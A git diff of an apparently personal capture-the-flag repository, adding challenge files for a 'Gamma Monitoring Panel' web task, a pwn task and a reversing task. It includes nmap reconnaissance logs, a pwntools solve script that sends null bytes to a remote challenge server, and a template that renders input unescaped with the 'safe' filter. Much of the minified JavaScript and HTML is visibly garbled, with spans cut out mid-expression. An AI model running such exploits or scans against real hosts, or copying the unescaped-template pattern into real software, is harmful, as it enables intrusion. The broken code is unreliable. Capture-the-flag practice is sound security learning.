ta(t,1)},pe.union=Co,pe.unionBy=Io,pe.unionWith=Oo,pe.uniq=function(t){return t&&t.length?Mu(t):[]},pe.uniqBy=function(t,n){return t&&t.length?Mu(t,Ti(n,2)):[]},pe.uniqWith=function(t,n){return n="function"==typeof n?n:i,t&&t.length?Mu(t,i,n):[]},pe.unset=function(t,n){return null==t||Pu(t,n)},pe.unzip=Eo,pe.unzipWith=Ro,pe.update=function(t,n,r){return null==t?t:Uu(t,n,Gu(r))},pe.updateWith=function(t,n,r,e){return e="function"==typeof e?e:i,null==t?t:Uu(t,n,Gu(r),e)},pe.values=pc,pe.valuesIn=function(t){return null==t?[]:yr(t,ic(t))},pe.without=Lo,pe.words=kc,pe.wrap=function(t,n){return sa(Gu(n),t)},pe.xor=Bo,pe.xorBy=To,pe.xorWith=Wo,pe.zip=Mo,pe.zipObject=function(t,n){return Fu(t||[],n||[],Ce)},pe.zipObjectDeep=function(t,n){return Fu(t||[],n||[],Au)},pe.zipWith=Po,pe.entries=lc,pe.entriesIn=hc,pe.extend=Za,pe.extendWith=Ka,Bc(pe,pe),pe.add=qc,pe.attempt=Sc,pe.camelCase=vc,pe.capitalize=_c,pe.ceil=Gc,pe.clamp=function(t,n,r){return r===i&&(r=n,n=i),r!==i&&(r=(r=Fa(r))==r?r:0),n!==i&&(n=(n=Fa(n))==n?n:0),Be(Fa(t),n,r)},pe.clone=function(t){return Te(t,v)},pe.cloneDeep=function(t){return Te(t,h|v)},pe.cloneDeepWith=function(t,n){return Te(t,h|v,n="function"==typeof n?n:i)},pe.cloneWith=function(t,n){return Te(t,v,n="function"==typeof n?n:i)},pe.conformsTo=function(t,n){return null==n||We(t,n,uc(n))},pe.deburr=gc,pe.defaultTo=function(t,n){return null==t||t!=t?n:t},pe.divide=Vc,pe.endsWith=function(t,n,r){t=Ga(t),n=Wu(n);var e=t.length,u=r=r===i?e:Be(Na(r),0,e);return(r-=n.length)>=0&&t.slice(r,u)==n},pe.eq=pa,pe.escape=function(t){return(t=Ga(t))&&St.test(t)?t.replace(jt,jr):t},pe.escapeRegExp=function(t){return(t=Ga(t))&&Lt.test(t)?t.replace(Rt,"\\$&"):t},pe.every=function(t,n,r){var e=da(t)?Jn:Ne;return r&&Vi(t,n,r)&&(n=i),e(t,Ti(n,3))},pe.find=Fo,pe.findIndex=_o,pe.findKey=function(t,n){return or(t,Ti(n,3),Ze)},pe.findLast=qo,pe.findLastIndex=go,pe.findLastKey=function(t,n){return or(t,Ti(n,3),Ke)},pe.floor=Zc,pe.forEach=Go,pe.forEachRight=Vo,pe.forIn=function(t,n){return null==t?t:Ge(t,Ti(n,3),ic)},pe.forInRight=function(t,n){return null==t?t:Ve(t,Ti(n,3),ic)},pe.forOwn=function(t,n){return t&&Ze(t,Ti(n,3))},pe.forOwnRight=function(t,n){return t&&Ke(t,Ti(n,3))},pe.get=Xa,pe.gt=va,pe.gte=_a,pe.has=function(t,n){return null!=t&&$i(t,n,tu)},pe.hasIn=tc,pe.head=wo,pe.identity=Oc,pe.includes=function(t,n,r,e){t=wa(t)?t:pc(t),r=r&&!e?Na(r):0;var u=t.length;return r<0&&(r=Gr(u+r,0)),Ba(t)?r<=u&&t.indexOf(n,r)>-1:!!u&&cr(t,n,r)>-1},pe.indexOf=function(t,n,r){var e=null==t?0:t.length;if(!e)return-1;var u=null==r?0:Na(r);return u<0&&(u=Gr(e+u,0)),cr(t,n,u)},pe.inRange=function(t,n,r){return n=Da(n),r===i?(r=n,n=0):r=Da(r),function(t,n,r){return t>=Vr(n,r)&&t=-B&&t<=B},pe.isSet=La,pe.isString=Ba,pe.isSymbol=Ta,pe.isTypedArray=Wa,pe.isUndefined=function(t){return t===i},pe.isWeakMap=function(t){return Ca(t)&&Ni(t)==ot},pe.isWeakSet=function(t){return Ca(t)&&Qe(t)==at},pe.join=function(t,n){return null==t?"":Fr.call(t,n)},pe.kebabCase=dc,pe.last=jo,pe.lastIndexOf=function(t,n,r){var e=null==t?0:t.length;if(!e)return-1;var u=e;return r!==i&&(u=(u=Na(r))<0?Gr(e+u,0):Vr(u,e-1)),n==n?function(t,n,r){for(var e=r+1;e--;)if(t[e]===n)return e;return e}(t,n,u):ar(t,sr,u,!0)},pe.lowerCase=yc,pe.lowerFirst=wc,pe.lt=Ma,pe.lte=Pa,pe.max=function(t){return t&&t.length?$e(t,Oc,Xe):i},pe.maxBy=function(t,n){return t&&t.length?$e(t,Ti(n,2),Xe):i},pe.mean=function(t){return lr(t,Oc)},pe.meanBy=function(t,n){return lr(t,Ti(n,2))},pe.min=function(t){return t&&t.length?$e(t,Oc,lu):i},pe.minBy=function(t,n){return t&&t.length?$e(t,Ti(n,2),lu):i},pe.stubArray=$c,pe.stubFalse=Fc,pe.stubObject=function(){return{}},pe.stubString=function(){return""},pe.stubTrue=function(){return!0},pe.multiply=Hc,pe.nth=function(t,n){return t&&t.length?gu(t,Na(n)):i},pe.noConflict=function(){return Bn._===this&&(Bn._=gn),this},pe.noop=Tc,pe.now=Xo,pe.pad=function(t,n,r){t=Ga(t);var e=(n=Na(n))?Er(t):0;if(!n||e>=n)return t;var u=(n-e)/2;return di(Ur(u),r)+t+di(Pr(u),r)},pe.padEnd=function(t,n,r){t=Ga(t);var e=(n=Na(n))?Er(t):0;return n&&en){var e=t;t=n,n=e}if(r||t%1||n%1){var u=Hr();return Vr(t+u*(n-t+On("1e-"+((u+"").length-1))),n)}return mu(t,n)},pe.reduce=function(t,n,r){var e=da(t)?rr:vr,u=arguments.length<3;return e(t,Ti(n,4),r,u,Ue)},pe.reduceRight=function(t,n,r){var e=da(t)?er:vr,u=arguments.length<3;return e(t,Ti(n,4),r,u,De)},pe.repeat=function(t,n,r){return n=(r?Vi(t,n,r):n===i)?1:Na(n),xu(Ga(t),n)},pe.replace=function(){var t=arguments,n=Ga(t[0]);return t.length<3?n:n.replace(t[1],t[2])},pe.result=function(t,n,r){var e=-1,u=(n=Vu(n,t)).length;for(u||(u=1,t=i);++eB)return[];var r=M,e=Vr(t,M);n=Ti(n),t-=M;for(var u=gr(e,n);++r=o)return t;var c=r-Er(e);if(c<1)return e;var f=a?Ku(a,0,c).join(""):t.slice(0,c);if(u===i)return f+e;if(a&&(c+=f.length-c),Ra(u)){if(t.slice(c).search(u)){var s,l=f;for(u.global||(u=rn(u.source,Ga(Ft.exec(u))+"g")),u.lastIndex=0;s=u.exec(l);)var h=s.index;f=f.slice(0,h===i?c:h)}}else if(t.indexOf(Wu(u),c)!=c){var p=f.lastIndexOf(u);p>-1&&(f=f.slice(0,p))}return f+e},pe.unescape=function(t){return(t=Ga(t))&&kt.test(t)?t.replace(xt,Lr):t},pe.uniqueId=function(t){var n=++hn;return Ga(t)+n},pe.upperCase=xc,pe.upperFirst=jc,pe.each=Go,pe.eachRight=Vo,pe.first=wo,Bc(pe,(Kc={},Ze(pe,(function(t,n){ln.call(pe.prototype,n)||(Kc[n]=t)})),Kc),{chain:!1}),pe.VERSION="4.17.15",Kn(["bind","bindKey","curry","curryRight","partial","partialRight"],(function(t){pe[t].placeholder=pe})),Kn(["drop","take"],(function(t,n){de.prototype[t]=function(r){r=r===i?1:Gr(Na(r),0);var e=this.__filtered__&&!n?new de(this):this.clone();return e.__filtered__?e.__takeCount__=Vr(r,e.__takeCount__):e.__views__.push({size:Vr(r,M),type:t+(e.__dir__<0?"Right":"")}),e},de.prototype[t+"Right"]=function(n){return this.reverse()[t](n).reverse()}})),Kn(["filter","map","takeWhile"],(function(t,n){var r=n+1,e=r==E||3==r;de.prototype[t]=function(t){var n=this.clone();return n.__iteratees__.push({iteratee:Ti(t,3),type:r}),n.__filtered__=n.__filtered__||e,n}})),Kn(["head","last"],(function(t,n){var r="take"+(n?"Right":"");de.prototype[t]=function(){return this[r](1).value()[0]}})),Kn(["initial","tail"],(function(t,n){var r="drop"+(n?"":"Right");de.prototype[t]=function(){return this.__filtered__?new de(this):this[r](1)}})),de.prototype.compact=function(){return this.filter(Oc)},de.prototype.find=function(t){return this.filter(t).head()},de.prototype.findLast=function(t){return this.reverse().find(t)},de.prototype.invokeMap=ju((function(t,n){return"function"==typeof t?new de(this):this.map((function(r){return eu(r,t,n)}))})),de.prototype.reject=function(t){return this.filter(ca(Ti(t)))},de.prototype.slice=function(t,n){t=Na(t);var r=this;return r.__filtered__&&(t>0||n<0)?new de(r):(t<0?r=r.takeRight(-t):t&&(r=r.drop(t)),n!==i&&(r=(n=Na(n))<0?r.dropRight(-n):r.take(n-t)),r)},de.prototype.takeRightWhile=function(t){return this.reverse().takeWhile(t).reverse()},de.prototype.toArray=function(){return this.take(M)},Ze(de.prototype,(function(t,n){var r=/^(?:filter|find|map|reject)|While$/.test(n),e=/^(?:head|last)$/.test(n),u=pe[e?"take"+("last"==n?"Right":""):n],o=e||/^find/.test(n);u&&(pe.prototype[n]=function(){var n=this.__wrapped__,a=e?[1]:arguments,c=n instanceof de,f=a[0],s=c||da(n),l=function(t){var n=u.apply(pe,nr([t],a));return e&&h?n[0]:n};s&&r&&"function"==typeof f&&1!=f.length&&(c=s=!1);var h=this.__chain__,p=!!this.__actions__.length,v=o&&!h,_=c&&!p;if(!o&&s){n=_?n:new de(this);var g=t.apply(n,a);return g.__actions__.push({func:Do,args:[l],thisArg:i}),new ge(g,h)}return v&&_?t.apply(this,a):(g=this.thru(l),v?e?g.value()[0]:g.value():g)})})),Kn(["pop","push","shift","sort","splice","unshift"],(function(t){var n=on[t],r=/^(?:push|sort|unshift)$/.test(t)?"tap":"thru",e=/^(?:pop|shift)$/.test(t);pe.prototype[t]=function(){var t=arguments;if(e&&!this.__chain__){var u=this.value();return n.apply(da(u)?u:[],t)}return this[r]((function(r){return n.apply(da(r)?r:[],t)}))}})),Ze(de.prototype,(function(t,n){var r=pe[n];if(r){var e=r.name+"";ln.call(ue,e)||(ue[e]=[]),ue[e].push({name:n,func:r})}})),ue[pi(i,y).name]=[{name:"wrapper",func:i}],de.prototype.clone=function(){var t=new de(this.__wrapped__);return t.__actions__=ri(this.__actions__),t.__dir__=this.__dir__,t.__filtered__=this.__filtered__,t.__iteratees__=ri(this.__iteratees__),t.__takeCount__=this.__takeCount__,t.__views__=ri(this.__views__),t},de.prototype.reverse=function(){if(this.__filtered__){var t=new de(this);t.__dir__=-1,t.__filtered__=!0}else(t=this.clone()).__dir__*=-1;return t},de.prototype.value=function(){var t=this.__wrapped__.value(),n=this.__dir__,r=da(t),e=n<0,u=r?t.length:0,i=function(t,n,r){var e=-1,u=r.length;for(;++e=this.__values__.length;return{done:t,value:t?i:this.__values__[this.__index__++]}},pe.prototype.plant=function(t){for(var n,r=this;r instanceof _e;){var e=lo(r);e.__index__=0,e.__values__=i,n?u.__wrapped__=e:n=e;var u=e;r=r.__wrapped__}return u.__wrapped__=t,n},pe.prototype.reverse=function(){var t=this.__wrapped__;if(t instanceof de){var n=t;return this.__actions__.length&&(n=new de(this)),(n=n.reverse()).__actions__.push({func:Do,args:[zo],thisArg:i}),new ge(n,this.__chain__)}return this.thru(zo)},pe.prototype.toJSON=pe.prototype.valueOf=pe.prototype.value=function(){return Nu(this.__wrapped__,this.__actions__)},pe.prototype.first=pe.prototype.head,Un&&(pe.prototype[Un]=function(){return this}),pe}();Bn._=Br,(u=function(){return Br}.call(n,r,n,e))===i||(e.exports=u)}).call(this)}).call(this,r(5),r(6)(t))},function(t,n,r){var e=r(2);"string"==typeof e&&(e=[[t.i,e,""]]);var u={insert:"head",singleton:!1};r(4)(e,u);e.locals&&(t.exports=e.locals)},function(t,n,r){(t.exports=r(3)(!1)).push([t.i,".lcd-container{padding:20px 30px;background-color:#c7e736;color:red;display:inline-block;font-size:0;border-color:#000;border-style:solid;border-width:10px 14px;box-shadow:inset 0 0 30px rgba(0,0,0,.3),0 10px 15px -5px rgba(0,0,0,.5);border-radius:3px;overflow:hidden}",""])},function(t,n,r){"use strict";t.exports=function(t){var n=[];return n.toString=function(){return this.map((function(n){var r=function(t,n){var r=t[1]||"",e=t[3];if(!e)return r;if(n&&"function"==typeof btoa){var u=(o=e,a=btoa(unescape(encodeURIComponent(JSON.stringify(o)))),c="sourceMappingURL=data:application/json;charset=utf-8;base64,".concat(a),"/*# ".concat(c," */")),i=e.sources.map((function(t){return"/*# sourceURL=".concat(e.sourceRoot).concat(t," */")}));return[r].concat(i).concat([u]).join("\n")}var o,a,c;return[r].join("\n")}(n,t);return n[2]?"@media ".concat(n[2],"{").concat(r,"}"):r})).join("")},n.i=function(t,r){"string"==typeof t&&(t=[[null,t,""]]);for(var e={},u=0;u{this.isVisible?this.render(!1):this.render(!0)},300))}}const i={20:{character:"Space",rows:[0,0,0,0,0,0,0]},21:{character:"!",rows:[4,4,4,4,4,0,4]},22:{character:'"',rows:[9,9,18,0,0,0,0]},23:{character:"#",rows:[10,10,31,10,31,10,10]},24:{character:"$",rows:[4,15,20,14,5,30,4]},25:{character:"%",rows:[25,25,2,4,8,19,19]},26:{character:"&",rows:[4,10,10,10,21,18,13]},27:{character:"'",rows:[4,4,8,0,0,0,0]},28:{character:"(",rows:[2,4,8,8,8,4,2]},29:{character:")",rows:[8,4,2,2,2,4,8]},"2a":{character:"*",rows:[4,21,14,31,14,21,4]},"2b":{character:"+",rows:[0,4,4,31,4,4,0]},"2c":{character:",",rows:[0,0,0,0,4,4,8]},"2d":{character:"-",rows:[0,0,0,31,0,0,0]},"2e":{character:".",rows:[0,0,0,0,0,12,12]},"2f":{character:"/",rows:[1,1,2,4,8,16,16]},30:{character:"0",rows:[14,17,19,21,25,17,14]},31:{character:"1",rows:[4,12,4,4,4,4,14]},32:{character:"2",rows:[14,17,1,2,4,8,31]},33:{character:"3",rows:[14,17,1,6,1,17,14]},34:{character:"4",rows:[2,6,10,18,31,2,2]},35:{character:"5",rows:[31,16,30,1,1,17,14]},36:{character:"6",rows:[6,8,16,30,17,17,14]},37:{character:"7",rows:[31,1,2,4,8,8,8]},38:{character:"8",rows:[14,17,17,14,17,17,14]},39:{character:"9",rows:[14,17,17,15,1,2,12]},"3a":{character:":",rows:[0,12,12,0,12,12,0]},"3b":{character:";",rows:[0,12,12,0,12,4,8]},"3c":{character:"<",rows:[2,4,8,16,8,4,2]},"3d":{character:"=",rows:[0,0,31,0,31,0,0]},"3e":{character:">",rows:[8,4,2,1,2,4,8]},"3f":{character:"?",rows:[14,17,1,2,4,0,4]},40:{character:"@",rows:[14,17,23,21,23,16,15]},41:{character:"A",rows:[4,10,17,17,31,17,17]},42:{character:"B",rows:[30,17,17,30,17,17,30]},43:{character:"C",rows:[14,17,16,16,16,17,14]},44:{character:"D",rows:[30,9,9,9,9,9,30]},45:{character:"E",rows:[31,16,16,28,16,16,31]},46:{character:"F",rows:[31,16,16,31,16,16,16]},47:{character:"G",rows:[14,17,16,16,19,17,15]},48:{character:"H",rows:[17,17,17,31,17,17,17]},49:{character:"I",rows:[14,4,4,4,4,4,14]},"4a":{character:"J",rows:[31,2,2,2,2,18,12]},"4b":{character:"K",rows:[17,18,20,24,20,18,17]},"4c":{character:"L",rows:[16,16,16,16,16,16,31]},"4d":{character:"M",rows:[17,27,21,17,17,17,17]},"4e":{character:"N",rows:[17,17,25,21,19,17,17]},"4f":{character:"O",rows:[14,17,17,17,17,17,14]},50:{character:"P",rows:[30,17,17,30,16,16,16]},51:{character:"Q",rows:[14,17,17,17,21,18,13]},52:{character:"R",rows:[30,17,17,30,20,18,17]},53:{character:"S",rows:[14,17,16,14,1,17,14]},54:{character:"T",rows:[31,4,4,4,4,4,4]},55:{character:"U",rows:[17,17,17,17,17,17,14]},56:{character:"V",rows:[17,17,17,17,17,10,4]},57:{character:"W",rows:[17,17,17,21,21,27,17]},58:{character:"X",rows:[17,17,10,4,10,17,17]},59:{character:"Y",rows:[17,17,10,4,4,4,4]},"5a":{character:"Z",rows:[31,1,2,4,8,16,31]},"5b":{character:"[",rows:[14,8,8,8,8,8,14]},"5c":{character:"\\",rows:[16,16,8,4,2,1,1]},"5d":{character:"]",rows:[14,2,2,2,2,2,14]},"5e":{character:"^",rows:[4,10,17,0,0,0,0]},"5f":{character:"_",rows:[0,0,0,0,0,0,31]},60:{character:"`",rows:[4,4,2,0,0,0,0]},61:{character:"a",rows:[0,14,1,13,19,19,13]},62:{character:"b",rows:[16,16,16,28,18,18,28]},63:{character:"c",rows:[0,0,0,14,16,16,14]},64:{character:"d",rows:[1,1,1,7,9,9,7]},65:{character:"e",rows:[0,0,14,17,31,16,15]},66:{character:"f",rows:[6,9,8,28,8,8,8]},67:{character:"g",rows:[14,17,19,13,1,1,14]},68:{character:"h",rows:[16,16,16,22,25,17,17]},69:{character:"i",rows:[0,4,0,12,4,4,14]},"6a":{character:"j",rows:[2,0,6,2,2,18,12]},"6b":{character:"k",rows:[16,16,18,20,24,20,18]},"6c":{character:"l",rows:[12,4,4,4,4,4,4]},"6d":{character:"m",rows:[0,0,10,21,21,17,17]},"6e":{character:"n",rows:[0,0,22,25,17,17,17]},"6f":{character:"o",rows:[0,0,14,17,17,17,14]},70:{character:"p",rows:[0,28,18,18,28,16,16]},71:{character:"q",rows:[0,7,9,9,7,1,1]},72:{character:"r",rows:[0,0,22,25,16,16,16]},73:{character:"s",rows:[0,0,15,16,14,1,30]},74:{character:"t",rows:[8,8,28,8,8,9,6]},75:{character:"u",rows:[0,0,17,17,17,19,13]},76:{character:"v",rows:[0,0,17,17,17,10,4]},77:{character:"w",rows:[0,0,17,17,21,21,10]},78:{character:"x",rows:[0,0,17,10,4,10,17]},79:{character:"y",rows:[0,17,17,15,1,17,14]},"7a":{character:"z",rows:[0,0,31,2,4,8,31]},"7b":{character:"{",rows:[6,8,8,16,8,8,6]},"7c":{character:"|",rows:[4,4,4,0,4,4,4]},"7d":{character:"}",rows:[12,2,2,1,2,2,12]},"7e":{character:"~",rows:[8,21,2,0,0,0,0]},"7f":{character:"DEL",rows:[31,31,31,31,31,31,31]}},o=(t,n)=>{return(Array(n).fill("0").join(0)+t).slice(-n)};class a{constructor({canvas:t,index:n,rows:r,columns:e,pixelSize:i,pixelColor:o}={}){this.canvas=t,this.index=n,this.rows=r,this.columns=e,this.pixelSize=i,this.pixelColor=o,this.setPosition(),this.pixels=[...Array(a.getPixelCount())].map((t,n)=>new u({canvas:this.canvas,index:n,size:this.pixelSize,color:this.pixelColor,offset:{x:this.x,y:this.y}})),this.render()}static getPixels(){return{row:5,column:8}}static getPixelCount(){const{row:t,column:n}=a.getPixels();return t*n}static getGutterSize(t){return t}static getSize(t){const{row:n,column:r}=a.getPixels(),e=u.getGutterSize(t);return{width:t*n+e*(n-1),height:t*r+e*(r-1)}}setPosition(){this.gutter=a.getGutterSize(this.pixelSize);const{width:t,height:n}=a.getSize(this.pixelSize),r=this.index%this.columns,e=Math.floor(this.index/this.columns);this.x=r*t+r*this.gutter,this.y=e*n+e*this.gutter}render(){this.pixels.forEach(t=>{t.render(!1)})}writeCharacter({charCode:t}){this.clearCharacter();const n=Object(e.isNumber)(t)?Number(t).toString(16):t,{rows:r}=i[n],u=r.map(t=>{const n=Number(t).toString(2);return o(n,5)}).join("").split("");this.pixels.forEach(t=>{const n=u[t.index];t.render("1"===n)})}clearCharacter(){this.pixels.forEach(t=>{t.render(!1)})}toggleCursorBlink(t=!1){const{row:n}=a.getPixels();this.pixels.slice(-n).forEach(n=>{n.blink(t)})}}class c{constructor({elem:t,rows:n,columns:r,pixelSize:e,pixelColor:u}){this.rows=n,this.columns=r,this.pixelSize=e,this.pixelColor=u,this.elem=t,this.render(),this.blocks=[...Array(this.rows*this.columns)].map((t,n)=>new a({canvas:this.canvas,index:n,rows:this.rows,columns:this.columns,pixelSize:e,pixelColor:u})),this.activeBlockIndex=null}static getSize(t,n,r){const e=a.getSize(r),u=a.getGutterSize(r);return{width:e.width*n+u*(n-1),height:e.height*t+u*(t-1)}}render(){this.canvas=document.createElement("canvas");const{width:t,height:n}=c.getSize(this.rows,this.columns,this.pixelSize);this.canvas.setAttribute("width",t),this.canvas.setAttribute("height",n),this.elem.innerHTML="",this.elem.appendChild(this.canvas)}writeCharacter({charCode:t,blockIndex:n=0}={}){const r=Object(e.find)(this.blocks,{index:n});r&&r.writeCharacter({charCode:t})}writeString({string:t="",offset:n=0}={}){t.split("").forEach((t,r)=>{const e=t.charCodeAt(0);this.writeCharacter({charCode:e,blockIndex:r+n})})}clearCharacter({blockIndex:t=0}={}){const n=Object(e.find)(this.blocks,{index:t});n&&n.clearCharacter()}clearScreen(){this.blocks.forEach(t=>{this.clearCharacter({blockIndex:t.index})})}blinkCursor({blockIndex:t=0,stop:n=!1}={}){const r=Object(e.find)(this.blocks,{index:t});if(r){if(null!==this.activeBlockIndex){Object(e.find)(this.blocks,{index:this.activeBlockIndex}).toggleCursorBlink(!0)}this.activeBlockIndex=t,r.toggleCursorBlink(n)}}}n.default=c}]).default})); +//# sourceMappingURL=index.js.map diff --git a/LaokoonHaxorcist/hw_invasion/hw_invasion/challenge/templates/index.html b/LaokoonHaxorcist/hw_invasion/hw_invasion/challenge/templates/index.html new file mode 100644 index 00000000..30a50ab9 --- /dev/null +++ b/LaokoonHaxorcist/hw_invasion/hw_invasion/challenge/templates/index.html @@ -0,0 +1,139 @@ + + + + + + + + +Gamma Monitoring Panel + + + + + + + + + + + + + + +
+

Gamma Monitoring System


+
+
+
{{tmpl|safe}}
+ +
+
+ +
+ +

+ + + + +



{{fm|safe}} +
+
+ + + + + + + diff --git a/LaokoonHaxorcist/hw_invasion/hw_invasion/config/supervisord.conf b/LaokoonHaxorcist/hw_invasion/hw_invasion/config/supervisord.conf new file mode 100644 index 00000000..d6b22863 --- /dev/null +++ b/LaokoonHaxorcist/hw_invasion/hw_invasion/config/supervisord.conf @@ -0,0 +1,27 @@ +[supervisord] +nodaemon=true +logfile=/dev/null +logfile_maxbytes=0 +pidfile=/run/supervisord.pid + +[program:flask] +command=python3 /app/app.py +stdout_logfile=/dev/stdout +stdout_logfile_maxbytes=0 +stderr_logfile=/dev/stderr +stderr_logfile_maxbytes=0 + +[program:modbus] +command=python3 /app/server.py +stdout_logfile=/dev/stdout +stdout_logfile_maxbytes=0 +stderr_logfile=/dev/stderr +stderr_logfile_maxbytes=0 + +[program:bot] +command=python3 /app/bot.py +stdout_logfile=/dev/stdout +stdout_logfile_maxbytes=0 +stderr_logfile=/dev/stderr +stderr_logfile_maxbytes=0 + diff --git a/LaokoonHaxorcist/pwn_formula/flag.txt b/LaokoonHaxorcist/pwn_formula/flag.txt new file mode 100644 index 00000000..8c8ec324 --- /dev/null +++ b/LaokoonHaxorcist/pwn_formula/flag.txt @@ -0,0 +1 @@ +HTB{f4k3_fl4g_4_t35t1ng} diff --git a/LaokoonHaxorcist/pwn_formula/formula b/LaokoonHaxorcist/pwn_formula/formula new file mode 100755 index 00000000..da28b769 Binary files /dev/null and b/LaokoonHaxorcist/pwn_formula/formula differ diff --git a/LaokoonHaxorcist/pwn_formula/results/10.129.243.131/report/local.txt b/LaokoonHaxorcist/pwn_formula/results/10.129.243.131/report/local.txt new file mode 100644 index 00000000..e69de29b diff --git a/LaokoonHaxorcist/pwn_formula/results/10.129.243.131/report/proof.txt b/LaokoonHaxorcist/pwn_formula/results/10.129.243.131/report/proof.txt new file mode 100644 index 00000000..e69de29b diff --git a/LaokoonHaxorcist/pwn_formula/results/10.129.243.131/scans/_commands.log b/LaokoonHaxorcist/pwn_formula/results/10.129.243.131/scans/_commands.log new file mode 100644 index 00000000..cc0779cd --- /dev/null +++ b/LaokoonHaxorcist/pwn_formula/results/10.129.243.131/scans/_commands.log @@ -0,0 +1,4 @@ +nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN "/home/simon/CTF/LaokoonHaxorcist/pwn_formula/results/10.129.243.131/scans/_quick_tcp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/pwn_formula/results/10.129.243.131/scans/xml/_quick_tcp_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN "/home/simon/CTF/LaokoonHaxorcist/pwn_formula/results/10.129.243.131/scans/_full_tcp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/pwn_formula/results/10.129.243.131/scans/xml/_full_tcp_nmap.xml" 10.129.243.131 + diff --git a/LaokoonHaxorcist/pwn_formula/results/10.129.243.131/scans/_full_tcp_nmap.txt b/LaokoonHaxorcist/pwn_formula/results/10.129.243.131/scans/_full_tcp_nmap.txt new file mode 100644 index 00000000..a6a9e652 --- /dev/null +++ b/LaokoonHaxorcist/pwn_formula/results/10.129.243.131/scans/_full_tcp_nmap.txt @@ -0,0 +1 @@ +# Nmap 7.93 scan initiated Sat Oct 28 13:10:06 2023 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN /home/simon/CTF/LaokoonHaxorcist/pwn_formula/results/10.129.243.131/scans/_full_tcp_nmap.txt -oX /home/simon/CTF/LaokoonHaxorcist/pwn_formula/results/10.129.243.131/scans/xml/_full_tcp_nmap.xml 10.129.243.131 diff --git a/LaokoonHaxorcist/pwn_formula/results/10.129.243.131/scans/_quick_tcp_nmap.txt b/LaokoonHaxorcist/pwn_formula/results/10.129.243.131/scans/_quick_tcp_nmap.txt new file mode 100644 index 00000000..a7274f97 --- /dev/null +++ b/LaokoonHaxorcist/pwn_formula/results/10.129.243.131/scans/_quick_tcp_nmap.txt @@ -0,0 +1 @@ +# Nmap 7.93 scan initiated Sat Oct 28 13:10:06 2023 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN /home/simon/CTF/LaokoonHaxorcist/pwn_formula/results/10.129.243.131/scans/_quick_tcp_nmap.txt -oX /home/simon/CTF/LaokoonHaxorcist/pwn_formula/results/10.129.243.131/scans/xml/_quick_tcp_nmap.xml 10.129.243.131 diff --git a/LaokoonHaxorcist/pwn_formula/results/10.129.243.131/scans/xml/_full_tcp_nmap.xml b/LaokoonHaxorcist/pwn_formula/results/10.129.243.131/scans/xml/_full_tcp_nmap.xml new file mode 100644 index 00000000..4559abe7 --- /dev/null +++ b/LaokoonHaxorcist/pwn_formula/results/10.129.243.131/scans/xml/_full_tcp_nmap.xml @@ -0,0 +1,17 @@ + + + + + + + + + + + + + + + + + diff --git a/LaokoonHaxorcist/pwn_formula/results/10.129.243.131/scans/xml/_quick_tcp_nmap.xml b/LaokoonHaxorcist/pwn_formula/results/10.129.243.131/scans/xml/_quick_tcp_nmap.xml new file mode 100644 index 00000000..f19ead27 --- /dev/null +++ b/LaokoonHaxorcist/pwn_formula/results/10.129.243.131/scans/xml/_quick_tcp_nmap.xml @@ -0,0 +1,17 @@ + + + + + + + + + + + + + + + + + diff --git a/LaokoonHaxorcist/pwn_formula/solve.py b/LaokoonHaxorcist/pwn_formula/solve.py new file mode 100644 index 00000000..b8131a67 --- /dev/null +++ b/LaokoonHaxorcist/pwn_formula/solve.py @@ -0,0 +1,9 @@ +from pwn import * + + +# io = process("./formula") + +io = remote("94.237.59.206", 35564) +io.recvuntil("[Marty]:") +io.send(b'\x00' *8) +io.interactive() diff --git a/LaokoonHaxorcist/rev_stringtheory/stringtheory b/LaokoonHaxorcist/rev_stringtheory/stringtheory new file mode 100644 index 00000000..2849acbe Binary files /dev/null and b/LaokoonHaxorcist/rev_stringtheory/stringtheory differ diff --git a/LaokoonHaxorcist/rev_threekeys/ape.c b/LaokoonHaxorcist/rev_threekeys/ape.c new file mode 100644 index 00000000..46252418 --- /dev/null +++ b/LaokoonHaxorcist/rev_threekeys/ape.c @@ -0,0 +1,60 @@ +#include + + +KEY1 = { 0xf2, 0xe7, 0xbf, 0xd7, 0x53, 0xc6, 0x4b, 0x26, 0x97, 0xf9, 0x69, 0x87, 0xe6, 0x84, 0x28, 0xe8 } +KEY2 = { 0xdc, 0xf9, 0x90, 0x26, 0x92, 0x27, 0x33, 0x67, 0x24, 0x08, 0xc6, 0x45, 0x51, 0xc7, 0x3a, 0x33 } +KEY3 = { 0xee, 0x31, 0xce, 0xd8, 0x10, 0x70, 0x40, 0xa0, 0xd9, 0x53, 0xcf, 0x57, 0x32, 0x79, 0x73, 0xd5 } +int decrypt(EVP_PKEY_CTX *ctx,uchar *out,size_t *outlen,uchar *in,size_t inlen) + +{ + int local_c; + + for (local_c = 0; local_c < (int)outlen; local_c = local_c + 1) { + AES_decrypt((uchar *)(ctx + (local_c << 4)),out + (local_c << 4),(AES_KEY *)in); + } + return local_c; +} + + + +AES_KEY * the_third_key(void) + +{ + AES_KEY *key; + + key = (AES_KEY *)malloc(0xf4); + AES_set_decrypt_key(KEY1,0x80,key); + return key; +} + + +AES_KEY * the_second_key(void) + +{ + AES_KEY *key; + + key = (AES_KEY *)malloc(0xf4); + AES_set_decrypt_key(KEY2,0x80,key); + return key; +} + + +AES_KEY * the_first_key(void) + +{ + AES_KEY *key; + + key = (AES_KEY *)malloc(0xf4); + AES_set_decrypt_key(KEY3,0x80,key); + return key; +} + +int main(){ + undefined8 *crypt; + crypt = (undefined8 *)malloc(0x20); + FLAG = (char *)malloc(0x20); + *crypt = 0xa646484365c8eb8c; + crypt[1] = 0x9f803f2f42e80598; + crypt[2] = 0x3ed81a287db3c9a8; + crypt[3] = 0x6cb78fe92b1abaaa; +} \ No newline at end of file diff --git a/LaokoonHaxorcist/rev_threekeys/threekeys b/LaokoonHaxorcist/rev_threekeys/threekeys new file mode 100755 index 00000000..e819d9eb Binary files /dev/null and b/LaokoonHaxorcist/rev_threekeys/threekeys differ diff --git a/LaokoonHaxorcist/rev_threekeys/threekeys.patched b/LaokoonHaxorcist/rev_threekeys/threekeys.patched new file mode 100755 index 00000000..e6a033b3 Binary files /dev/null and 